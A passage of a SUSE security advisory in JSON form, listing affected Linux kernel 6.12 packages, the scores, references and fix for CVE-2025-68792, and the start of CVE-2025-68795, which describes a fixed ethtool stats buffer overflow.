"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68792",
"url": "https://www.suse.com/security/cve/CVE-2025-68792"
},
{
"category": "external",
"summary": "SUSE Bug 1256656 for CVE-2025-68792",
"url": "https://bugzilla.suse.com/1256656"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68792"
},
{
"cve": "CVE-2025-68795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nethtool: Avoid overflowing userspace buffer on stats query\n\nThe ethtool -S command operates across three ioctl calls:\nETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and\nETHTOOL_GSTATS for the values.\n\nIf the number of stats changes between these calls (e.g., due to device\nreconfiguration), userspace\u0027s buffer allocation will be incorrect,\npotentially leading to buffer overflow.\n\nDrivers are generally expected to maintain stable stat counts, but some\ndrivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making\nthis scenario possible.\n\nSome drivers try to handle this internally:\n- bnad_get_ethtool_stats() returns early in case stats.n_stats is not\n equal to the driver\u0027s stats count.\n- micrel/ksz884x also makes sure not to write anything beyond\n stats.n_stats and overflow the buffer.\n\nHowever, both use stats.n_stats which is already assigned with the value\nreturned from get_sset_count(), hence won\u0027t solve the issue described\nhere.\n\nChange ethtool_get_strings(), ethtool_get_stats(),\nethtool_get_phy_stats() to not return anything in case of a mismatch\nbetween userspace\u0027s size and get_sset_size(), to prevent buffer\noverflow.\nThe returned n_stats value will be equal to zero, to reflect that\nnothing has been returned.\n\nThis could result in one of two cases when using upstream ethtool,\ndepending on when the size change is detected:\n1. When detected in ethtool_get_strings():\n # ethtool -S eth2\n no stats available\n\n2. When detected in get stats, all stats will be reported as zero.\n\nBoth cases are presumably transient, and a subsequent ethtool call\nshould succeed.\n\nOther than the overflow avoidance, these two cases are very evident (no\noutput/cleared stats), which is arguably better than presenting\nincorrect/shifted stats.\nI also considered returning an error instead of a \"silent\" response, but\nthat seems more destructive towards userspace apps.\n\nNotes:\n- This patch does not claim to fix the inherent race, it only makes sure\n that we do not overflow the userspace buffer, and makes for a more\n predictable behavior.\n\n- RTNL lock is held during each ioctl, the race window exists between\n the separate ioctl calls when the lock is released.\n\n- Userspace ethtool always fills stats.n_stats, but it is likely that\n these stats ioctls are implemented in other userspace applications\n which might not fill it. The added code checks that it\u0027s not zero,\n to prevent any regressions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
